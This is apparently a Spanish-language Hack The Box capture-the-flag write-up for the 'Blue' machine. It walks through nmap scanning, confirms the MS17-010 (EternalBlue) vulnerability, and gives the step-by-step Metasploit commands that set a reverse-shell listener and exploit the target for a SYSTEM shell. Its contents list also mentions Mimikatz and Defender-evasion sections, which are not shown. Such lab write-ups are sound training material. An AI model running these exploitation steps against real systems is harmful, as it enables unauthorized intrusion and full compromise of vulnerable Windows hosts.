Blue

脥ndice

Hack The Box-Blue

Dificultad:聽F谩cil

  • SMB Enumeration
  • Ethernalblue Explotation (MS17-010)聽
  • Metasploit
  • Obtaning credentials stored聽 in memory [MIMIKATZ + Windows Defender Evasion] (Extra)
  • Enabling RDP from CrackMapExec (Extra)
  • Windows Persistence techniques (Extra)
  • Windows Persistence – Playing with debugger [When a user opens a program](Extra)
  • Windows Persistence – Playing with Gflags [When a user closes a program](Extra)
  • Windows Persistence – Playing with WMI Events [Executing tasks at regular intervals of time](Extra)
  • Persistence + Windows Defender Evasion [Playing with Ebowla](Extra)聽

Fase de Reconocimiento

En primer lugar, nos creamos un directorio con el nombre de la m谩quina desde el que trabajaremos:聽

				
					sudo mkdir Blue
				
			

Ahora, mediante la funci贸n聽mkt聽que tengo previamente definida en la聽.zshrc聽crearemos nuestros directorios de trabajo:

				
					sudo mkt
				
			

Esta funci贸n est谩 definida para crearnos cuatro directorios (nmap,聽content,聽exploits聽y聽scripts) desde los cuales poder trabajar a la hora de realizar las m谩quinas de HTB.

Ping

Ejecutamos unpingy vemos como nos reporta un ttl=127, por tanto, ya sabemos que estamos frente una m谩quina Windows.
				
					ping -c 1 10.10.10.40
				
			
comando ping

Nmap

Ahora mediante聽nmap聽realizaremos un escaneo de puertos:
				
					nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.40 -oG allPorts
				
			
  • -p- : Escanea todo el rango de puertos.
  • --open : Solo nos mostrar谩 puertos con el estatus abierto.
  • -sS : El escaneo SYN realizar r谩pidamente, escaneando miles de puertos por segundo en una red r谩pida que no se ve obstaculizada por firewalls intrusivos.
  • --min-rate : Controla directamente la tasa de escaneo. Nmap intentar谩 mantener la velocidad de env铆o en 5000 paquetes por segundo o m谩s.
  • -vvv : Triple verbose. Recopila los puertos abiertos por TCP y los reporta por consola. Cuanto m谩s verbose m谩s informaci贸n reporta mientras se realiza el escaneneo.
  • -n聽: Anula la resoluci贸n DNS.
escaneo de puertos con nmap
lista de puestos escaneados con nmap

Vemos como nos reporta los puertos 135,139,445 y 49157. Lo que de momento m谩s me llama la atenci贸n es que por el puerto 445 corre un servicio聽microsoft-ds. Vamos a realizr un segundo escaneo mediante聽nmap聽lanzado una serie de scripts de reconocimiento para ver si nos reporta algo m谩s de informaci贸n de estos puertos en concreto.

				
					nmap -sC -sV -v -n -p135,139,445,49157 10.10.10.40 -oG target
				
			
scripts de reconocimiento con namp
  • -sC : Lanza scrips b谩sicos de reconocimiento.
  • -sV : Localiza la versi贸n y servicio de los puertos definidos.
  • -p : Puertos a escanear.
  • -oN聽: Reporta los resultados en formato nmap al archivo聽target.
resultados de escaneo con scripts de reconocimientos con nmap

Vemos como nos da un poco m谩s de informaci贸n, pero lo m谩s interesante es que nos reporta la versi贸n exacta del sistema Windows, que este caso nos reporta un聽Windows 7 Professional 6.1.

resultados de nmap

Ahora vamos utilizar聽nmap para lanzar un script m谩s especifico y tratar de reportar alguna vulnerabilidad para est谩 versi贸n de Windows 7. Pero primero vamos a comprobar que disponemos del script. Para poder ver todo los scripts de nmap, podemos utilizar el comando聽locate .nse, donde se nos desplegar谩 una lista de todos los disponibles.

				
					locate .nse
				
			

Ahora para poder filtrar un poco los resultados, de forma paralela concatenamos un聽xargs grep "categories"聽y de est谩 forma filtraremos por todos los resultados que incluyen la palabra聽categories.

				
					locate .nse | xargs grep "categories"
				
			

Y ahora para terminar de filtrar los resultados dentro de categories, vamos a quedarnos solo con los resultados que nos especifican los scripts entre comillas, lo cual se conoce como聽DATA. Para poder filtrar pro data utilizaremos la expresi贸n regular聽'".*?"'聽de la siguiente manera:

				
					locate .nse | xargs grep "categories" | grep -oP '".*?"'
				
			

Finalmente vamos a quitar las categorias que se repitan mediante聽sort -u:

				
					locate .nse | xargs grep "categories" | grep -oP '".*?"' | sort -u
				
			

Bien, ahora para lanzar los scripts que deseamos que son聽vuln聽y聽safe, b谩sicamente estos scripts lanzan un chequeo para tratar de reportar las vulnerabilidades conocidas del sistema y聽safe聽lo utilizamos para no causar ning煤n tipo de denegaci贸n de servicio en el sistema que vamos a escanear.

				
					nmap --script "vuln and safe" -p445 10.10.10.40 -oN smbScan
				
			
  • --script "vuln and safe" : Especifica los scripts que vamos a utilizar.
  • -p445 : Especifica el puerto que vamos a chequear.
  • -oN smbScan聽: Exporta los resultados en formato nmap al archivo smbScan.

Vemos como nos reporta que este sistema es vulnerable al聽ms17-010聽m谩s conocido como EthernalBlue. Ahora que ya conocemos una vulnerabilidad vamos a tratar de buscar un exploit funcional.

				
					 searchsploit ms17-010
				
			
searchsploit ms17-010

Vemos que聽Metasploit聽nos reporta el exploit聽SMB Remote Code Execution Scanner (MS17-010) (Metasploit). Vamos abrir Metasploit y a buscar si disponemos del exploit.

Metasploit

Abrimos Metasploit:

				
					msfconsole
				
			
metasploit

Ahora buscamos filtrando por la vulnerabilidad聽ms17-010:

				
					 search ms17-010
				
			
search ms17-010

Vemos como la vulnerabilidad EthernarBlue aparece la primera, para seleccionarla utilizamos el comando聽use聽y especificamos el n煤mero del聽exploit聽en la lista, en este caso el聽0:

				
					use 0
				
			
use 0

Ahora que ya tenemos el exploit seleccionado, tenemos que configurarlo y preparado para el ataque. Para ver las opciones del exploit utilizamos el comando聽options:

metasploit options ms17-010

Para configurar el exploit debemos modificar el聽RHOSTS聽que es la Ip de la v铆ctima, el聽LHOST聽que ser谩 nuestra Ip p煤blica, en este caso la VPN de hack the box y finalmente, especificamos el puerto de escucha聽LPORT.

options
options

Finalmete ejecutamos el exploit:

				
					exploit
				
			
metasploit exploit

Si todo funciona correctamente se nos tendr铆a que abrir una shell. En caso de daros alg煤n error, es posible que teng谩is que reiniciar la m谩quina y el Metasploit y volver a intentar el ataque.

metasploit exploit

Esta vulnerabilidad es muy grave, ya que mediante este exploit pasamos a tenerlos m谩ximos privilegios, por tanto, podemos ver todos los archivos, incluida la flaf de聽root.

Para encontrar la primera flag simplemente nos dirigimos al directorio聽C:\Users\haris\Desktop:

hack the box blue